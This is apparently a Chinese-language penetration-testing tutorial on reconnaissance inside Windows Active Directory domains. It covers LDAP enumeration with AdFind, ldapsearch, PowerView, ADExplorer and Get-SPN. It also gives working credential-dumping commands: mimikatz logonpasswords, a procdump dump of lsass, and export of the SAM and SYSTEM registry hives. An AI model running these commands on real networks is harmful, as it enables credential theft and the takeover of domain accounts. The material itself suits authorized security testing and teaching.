域渗透信息收集

域渗透-信息收集

本文的ldap部分内容也发布至朋友运维的微信公众号：https://mp.weixin.qq.com/s/t_XidiNJvBIOIkUk_jFjig

在域中，往往一些目标是我的重点关注对象，比如exchange邮件服务器，比如域控，比如运维管理员的主机，比如堡垒机，我们信息收集主要就是去获取这些关键服务器的信息

判断主机是否在域内

使用systeminfo查看

systeminfo

在域环境下会显示

通常net view 会出错，可使用其他域查询命令

net user /domain

抓取hash

mimikatz使用小技巧

#一条命令,会在当前目录下生成mimikatz.log

.\mimikatz.exe log "privilege::debug" "sekurlsa::logonpasswords" exit

服务器上抓取

mimikatz抓hash，一般上传上去或者下载信息下来本地抓，但是上传上去后后续修改票据也可以用到mimikatz，必须要system权限才可以

mimikatz.exe "privilege::debug"

sekurlsa::logonpasswords

那么我们不是system权限，但是是administrator权限，执行失败

导出本地抓取-使用procdump

导出后本地抓取，需要system权限运行powershell或者cmd

#下载个procdump，https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump

#上传procdump.exe

procdump.exe -accepteula -ma lsass.exe lsass.dmp

#拷贝lsass.dmp下来，本地运行

mimikatz.exe "sekurlsa::minidump lsass.dmp"

sekurlsa::logonpasswords

抓取后会在当前目录生成一个lsass.dmp

之后运行将lsass.dmp复制到本地，即可

mimikatz.exe log "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" exit

导出抓取-从sam数据库提取

导出有2种方式

1.从注册表里面导出hiv

2.从C:\\System32\Config\sam 中提取

从注册表中导出

reg save hklm\sam sam.hiv
reg save hklm\system system.hiv

将sam.hiv 和system.hiv 复制到本地运行即可

mimikatz.ex log "lsadump::sam /sam:sam.hiv /system:system.hiv" exit

跑出来结果如下

查看历史登录账号

quser

查看域分组

net group "Domain Controllers" /domain

查看域主机

net group "domain controllers" /domain

获取域控ip,记住不需要加后面的$符号

ping DC01

查看域的密码策略

net accounts /domain

ldap查询语法

ldap是在域中独有的协议，能去查询域里面活动目录的基本信息，方便过滤有用的信息

ldap 是去查活动目录，活动目录是域控上的一个服务，正常情况下域控会开放一个389端口，这个端口就是供域内成员获取活动目录信息的，而活动目录相当于一个数据库，他的结构是树形的，我们可以一级一级的获取信息

去查活动目录是为了摸清楚整个域内的人员和服务器架构，因为每个人员都会记录描述身份，服务器的提供服务细节等详细信息，比通常的net user /domain之类的查询更加的详细，而我们再查询中关注的点为，用户，主机，域控，组织

在域控上运行中可使用adsiedit.msc工具，尝试普通的域主机不能打开该服务

打开后就是如下的页面

先明确几个概念，因为用户或者主机入域都会带有他自身的信息，比如属于哪个部门，比如姓名是啥，在域内这些信息都是公开的

在这个ldap查询的活动目录里面每个标志代表信息关系如下，套用安全客https://www.anquanke.com/post/id/195100 的图片

可以看到整个活动目录是一个树结构，每个节点都有他的信息

比如bob节点，他的属性有：uid=bob，ou=people，dc=acme，dc=org

这些属性对于这个节点叫做DN，而他的本身的属性比如uid=bob叫做RDN

而往往目录下会有3个标识，我们查询也会用到

• CN:Common Name
• OU:Organizational Unit
• DC:Domain Controller

他具有非常简单的查询语法

用与号 (&) 表示的 AND 运算符。
用竖线 (|) 表示的 OR 运算符。
用感叹号 (!) 表示的 NOT 运算符。
用名称和值表达式的等号 (=) 表示的相等比较。
用名称和值表达式中值的开头或结尾处的星号 (*) 表示的通配符。

这里拿adfind举例(后面会详细归纳几个工具)，查找primaryGroupID=513 sAMAccountName=Shi.zuan的用户

./adfind.exe -f "&(sAMAccountName=Shi.zuan)(&(primaryGroupID=513)(objectcategory=person))"

其实可以从上面看到，每条记录都会有一堆属性，而我们要使用语法去检索出对应人员或主机的信息，因为一口气全跑的话，比较大的域可能有上千条记录

域内组和OU

查询域内所有组

.\AdFind.exe -s subtree -bit -f "(objectclass=group)" -dn

组

对于分组我们可以大致画一个图

我们再域内生成的账号，在第一步他会自动默认为全局组账号，之后再由管理员分配到对应的域本地组里面去

OU

ou和组是2个东西，组是一堆均有一样权限的账号的集合，OU是逻辑的账号归属划分

举个例子CN=人事部,OU=上海总部,DC=klion,DC=local和OU=法务部,OU=上海总部,DC=klion,DC=local 这个是2个组织部门，他们的OU是不同的

那么每个部门假设都有一个网络运维人员，比如人事部是刘强，法务部是朱琳，那么这个时候刘强和朱琳在组中又是属于同一组，而OU不是同一个

域账号信息

每个域账号都有自己的信息，比如姓名，部门，描述，分组，账号创建时间，设置密码时间，上次登录时间等等，和直接的net user /domain比起来，前者具有更加详细的信息，而后者只是将账号进行一个罗列而已

在活动目录中，登录账号是UserPrincipalName字段和sAMAccountName字段

域主机

域主机其实没有啥特别的信息，主要就是去定位某些电脑是做什么的，域控是哪一个ip这些作用

但是域主机有个非常有用的地方在于，域主机的objectclass是继承的user这个类，user这个类是域用户的信息，那么域主机继承了user这个类，他就具有user这个类的属性，简而言之就是域主机能登录到域服务器中，他的登录账号为 主机名$

我们往往会遇到这么一个场景登录了一台属于域环境的主机，但是当前登录的账号里面没有域账号登录记录，并且当前账号仅为本地账号

上面这个场景中有个账号通用能访问到域里面的资产，即该主机账号

举个例子，当前主机账号为Ceshi1,为主机账号，无法访问到域

但这个ceshi1账号是administrator组的账号，可以提升到system，借助psexec提升到system权限，会显示拒绝访问

失败的原因是cmd不是管理员身份起的，再次使用管理员运行powershell或者cmd，此次的adfind同样不具备域访问凭证

使用psexec.exe提升至system权限

再次使用adfind.exe

ldap参数

从上面的例子可以看出，我们有3个参数查到这钻石这个用户，分别是sAMAccountName=Shi.zuan,primaryGroupID=513,objectcategory=person

这里的sAMAccountName和primaryGroupID不难看出就是钻石这个用户的属性值

而objectcategory这个参数表示该记录是属于哪一个目录的，在活动目录中有着2个比较重要的定位参数，一个叫objectcategory，另一个叫objectClass

objectClass

这个参数表示当前信息是属于哪一个类型的并且他的父类是什么，每一个记录都是一个类，有些记录在不同的目录下，但他们的数据结构相同他们也是一个类

下图这个人事部，这个"文件夹"的属性为top;organizationalUnit ， 他这个类叫做organizationalUnit，他的父类叫做top

在看上海总部这个"文件夹"，他的属性同样为top;organizationalUnit

那么我们再检索organizationalUnit这个类的时候，则会把相同格式属性的类("文件夹")罗列出来

objectcategory

这个参数表示当前信息是属于哪一条目录下的，像我们平时用的C:\User\Administrator\xxx 这样的目录，在活动目录中，我们同样有这样的目录，只是结构是OU=人事部,OU=上海总部,DC=klion,DC=local，对应的可视化界面如下，其实类比过来是一样的

那么使用工具进行查询，这条参数不是上图中上放的目录，是属性中的objectcategory属性信息

上图他属性众多，为了方便有时候可用只去查他的最近的一个属性，而这个属性其实和objectclass差不多，有些可能有细微的区别

比如上图查询的"文件夹"的记录，他最后一位的dn是CN=Organizational-Unit，他的标识属性为：organizationalUnit

工具使用

ldap查询场景分为3种，域外linux发起查询，域外windows发起查询，域内windows发起查询，因为域这个系统99%都是windows主机，那么在域内一般都是windows的系统

域外发起的比较鸡肋，你必须要知道一个域用户的账号密码才可以，在特定的条件下才能发挥作用。

域外linux

需要用到ldapsearch工具，在利用前需要知道dc的ip，以及一个域成员用户的账号密码

#下载
apt-get install ldap-utils

#利用方式
ldapsearch -x -H ldap://192.168.1.1:389 -D "CN=testa,CN=Users,DC=test,DC=com" -w DomainUser123! -b "DC=test,DC=com" "(&(objectCategory=computer)(objectClass=computer))"

上面的参数， -H ldap://域控ip:389 ， 已获取的其中一个域成员信息账号密码 -D "CN=testa,CN=Users,DC=test,DC=com" -w DomainUser123!，

域外windows

https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1

下载使用该工具

#先引入
Import-Module PowerView.ps1

#先载入用户名和密码
$uname="testa"                                                      
$pwd=ConvertTo-SecureString "DomainUser123!" -AsPlainText –Force                   
$cred=New-Object System.Management.Automation.PSCredential($uname,$pwd)    

#查询域用户
Get-NetUser -Domain test.com -DomainController 192.168.1.1 -ADSpath "LDAP://DC=test,DC=com" -Credential $cred

#查询域主机
Get-NetComputer -Domain test.com -DomainController 192.168.1.1 -ADSpath "LDAP://DC=test,DC=com" -Credential $cred

#查询域组
Get-Netgroup -Domain test.com -DomainController 192.168.1.1 -ADSpath "LDAP://DC=test,DC=com" -Credential $cred

域内信息收集

因为已经在域内了，信息收集非常方便

powerview.ps1

https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1

域外使用powerview，同样域内信息收集也可以使用powerview.ps1，并且因为已经在域内了，不再需要去输入账号密码

#先引入
Import-Module PowerView.ps1

#使用只查询域用户姓名信息
Get-NetUser | fl name

因为这里已经在域内，不带-Domain, -DomainController等参数也能查询是因为，他默认查询当前账号所在的域的信息

如果想要全面的信息，直接使用

Get-NetUser > log.txt

其他利用

#查询主机
Get-Netcomputer

#查询组
Get-Netgroup

这里注意下查询组的结果并不和net group /domain的结果完全一直，需要区分个概念，活动目录记录的是每台计算机或者用户的信息，他是可以编辑的相当于一个人员名册，而net group /domain是账号的权限划分

net group /domain 的结果

ADexplorer

ADexplorer为windows下查看ldap活动目录的一个常用的图形化工具

下载方式

wget http://live.sysinternals.com/ADExplorer.exe

打开后为如图所示界面，当你与域控建立有效通讯时，直接点击ok即可用当前账号登录成功

点击放大镜使用搜索语法

Adfind

adfind是windows域环境下的一个非常常用的命令工具

他的运行参数格式如下

AdFind.exe -b [域信息] -f [过滤条件] [返回属性]

#域信息一般是 DC=xxx，DC=local 这样的形式，如果账号已经在域内可以不填，如果有多个域可以访问，则需要填写

#过滤条件 一般为ldap的查询语法，使用""进行包裹

#返回属性为我们希望展示的数据，如果不填则一并返回

这里如果要使用xxx:AND:=111 这样的形式查询对应位数的信息时，一定要加上-bit参数，如果不加-bit则不会出数据

AdFind.exe -f "(grouptype:AND:=2)" -bit

比如去查询该域下面，人员信息的邮箱信息情况

我们也可以通过-c返回总共有多少条记录

AdFind.exe -f "(objectcategory=person)" -c

查询域内所有通用组

通用组即在访问林中所有的资产，如果查询该域内的通用组，即查到的组即也可以请求其他域中的资产

.\AdFind.exe -s subtree -bit -f "(&(objectclass=group)(grouptype:AND:=8))" -dn

查询域内所有全局组

全局组作用是他是一某一个域内创建的组，可以理解为刚新创一个域账号时他是属于全局组的，在域内可以登录域内主机，而它又被其他域进行了受信，即他即能访问本域的资产，又可以访问授信域的资产

.\AdFind.exe -s subtree -bit -f "(&(objectclass=group)(grouptype:AND:=2))" -dn

查询域内所有域本地组

域本地组即在域内可以活动的组信息

.\AdFind.exe -s subtree -bit -f "(&(objectclass=group)(grouptype:AND:=4))" -dn 

AdFind我们可以去查各种属性，当然也可用它去查路径就比如这里的图片上方的 Path这个路径

.\AdFind.exe -b OU=人事部,OU=上海总部,DC=klion,DC=local

使用-tdc转换时间为可读时间

.\AdFind.exe -bit -f "&(objectclass=person)(sAMAccountName=Oadmin)" -tdc

没转换前是这样的时间戳

转换后

Get-SPN

https://github.com/nullbind/Powershellery/edit/master/Stable-ish/Get-SPN/Get-SPN.psm1

SPN 这个参数全称为ServicePrincipleName， 这个参数会记录即登录账号名称，但是往往在域中为了方便管理，通常会去把一些特定账号比如oa，mysql等等以服务的名字取命令登录账号。

get-spn能够快速找到域管用户登陆服务器记录和快速定位一些特殊服务器

#加载模块
Import-Module ./Get-SPN.psm1

#使用查找域管组登录过的服务
Get-SPN -type group -search "Domain Admins" -List yes | Format-Table –Autosize

#查找系统中一些特殊服务，以mssql为例
Get-SPN  -type service -search "MSSQLSvc*" -List yes | Format-Table –Autosize

参考文章

https://wooyun.js.org/drops/使用LDAP查询快速提升域权限.html

https://wooyun.js.org/drops/从活动目录获取域管理员权限的各种姿势.html

https://3gstudent.github.io/渗透基础-活动目录信息的获取

https://www.anquanke.com/post/id/195100

https://www.anquanke.com/post/id/195737

https://www.anquanke.com/post/id/196510

https://www.anquanke.com/post/id/197113

https://www.anquanke.com/post/id/197329